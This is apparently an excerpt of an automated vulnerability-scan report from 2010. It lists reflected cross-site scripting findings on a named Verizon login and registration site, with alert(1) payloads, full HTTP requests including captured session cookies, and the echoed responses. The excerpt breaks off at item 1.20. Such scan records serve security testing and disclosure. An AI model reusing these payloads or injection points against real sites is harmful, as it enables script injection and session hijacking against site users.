Path:	/ForyourHome/Registration/Reg/ORLogin.aspx

Issue detail

The value of the UIDPWD request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31ab8"><script>alert(1)</script>0ab8ac65924 was submitted in the UIDPWD parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/ORLogin.aspx?UIDPWD=Invalid31ab8"><script>alert(1)</script>0ab8ac65924&WTNOnly=Y HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA22V
Content-Type: text/html; charset=utf-8
Content-Length: 47366
Expires: Sat, 20 Nov 2010 02:33:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:33:55 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
<INPUT type="hidden" value="/sso/redirect/redirect.asp?Target=https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=AMFBAU&UIDPWD=Invalid31ab8"><script>alert(1)</script>0ab8ac65924&WTNOnly=Y" name="target">
...[SNIP]...

1.15. https://www22.verizon.com/ForyourHome/Registration/Reg/ORLogin.aspx [WTNOnly parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForyourHome/Registration/Reg/ORLogin.aspx

Issue detail

The value of the WTNOnly request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eb64"><script>alert(1)</script>4317d0b7492 was submitted in the WTNOnly parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/ORLogin.aspx?UIDPWD=Invalid&WTNOnly=Y3eb64"><script>alert(1)</script>4317d0b7492 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA22V
Content-Type: text/html; charset=utf-8
Content-Length: 47366
Expires: Sat, 20 Nov 2010 02:33:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:33:56 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
<INPUT type="hidden" value="/sso/redirect/redirect.asp?Target=https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=AMFBAU&UIDPWD=Invalid&WTNOnly=Y3eb64"><script>alert(1)</script>4317d0b7492" name="target">
...[SNIP]...

1.16. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The value of the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN request parameter is copied into the HTML document as plain text between tags. The payload 803f5<script>alert(1)</script>a7a0468d9ed was submitted in the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1803f5<script>alert(1)</script>a7a0468d9ed HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Encoding: gzip, deflate
Cookie: CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; Source=CHSI; RegistrationApp=SessionId=fe2667e8-4e28-4de7-8250-68e0b90911ca; VZGEO=west
Host: www22.verizon.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 00:59:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:59:08 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:04:08 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47430

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1803f5<script>alert(1)</script>a7a0468d9ed" name="target">
...[SNIP]...

1.17. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The value of the 3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN request parameter is copied into the HTML document as plain text between tags. The payload 78e35<script>alert(1)</script>a713bc75061 was submitted in the 3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=178e35<script>alert(1)</script>a713bc75061 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA24V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 01:09:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:09:31 GMT
Connection: keep-alive
Set-Cookie: RegistrationApp=SessionId=00ac6571-3565-4f1f-9c9c-e471f00b0bd4; domain=.verizon.com; path=/
Set-Cookie: VZGEO=west; domain=.verizon.com; path=/
Set-Cookie: NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f945525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:14:31 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47430

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=178e35<script>alert(1)</script>a713bc75061" name="target">
...[SNIP]...

1.18. https://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5db6f<script>alert(1)</script>d983fc34cd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1&5db6f<script>alert(1)</script>d983fc34cd0=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Encoding: gzip, deflate
Cookie: CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; Source=CHSI; RegistrationApp=SessionId=fe2667e8-4e28-4de7-8250-68e0b90911ca; VZGEO=west
Host: www22.verizon.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 01:03:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:03:14 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:08:14 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47433

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1&5db6f<script>alert(1)</script>d983fc34cd0=1" name="target">
...[SNIP]...

1.19. https://www22.verizon.com/foryourhome/GoFlow/MyVerizon/RegistrationBridge.aspx [Client parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/foryourhome/GoFlow/MyVerizon/RegistrationBridge.aspx

Issue detail

The value of the Client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b116d"%3balert(1)//c8e1f41e796 was submitted in the Client parameter. This input was echoed as b116d";alert(1)//c8e1f41e796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /foryourhome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=EFiOSTV-CHNL&Client=MYVERb116d"%3balert(1)//c8e1f41e796&getstarted=6hboupsell HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 22735
Expires: Sat, 20 Nov 2010 02:33:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:33:33 GMT
Connection: close
Set-Cookie: EOrdering=PN-DR-ENABLED=iVwfNps%2fXq8%3d&PROJNORTH-CLIENT=&WR58038_DC=efZHv8OIFvI%3d&HBXSOURCE=Z%2bMP4OJFy5%2fqmvWNgdEqqq8jhZx46tHx; domain=.verizon.com; path=/

<script language="javascript">    vzLogging_appName = "eOrdering";</script>

<script language="javascript" src="../Common/includes/js/pagetracker.js"></script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD
...[SNIP]...


               locationHref = locationHref + "&Client=" + "MYVERb116d";alert(1)//c8e1f41e796"


           location.href = locationHref + catHref;
           var appname = navigator.appName;
           if(appname != "Netscape")
           {

            var tempHTML = document.getElementById(Ctrl1).innerHTML;

...[SNIP]...

1.20. https://www22.verizon.com/foryourhome/MyAccount/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www22.verizon.com
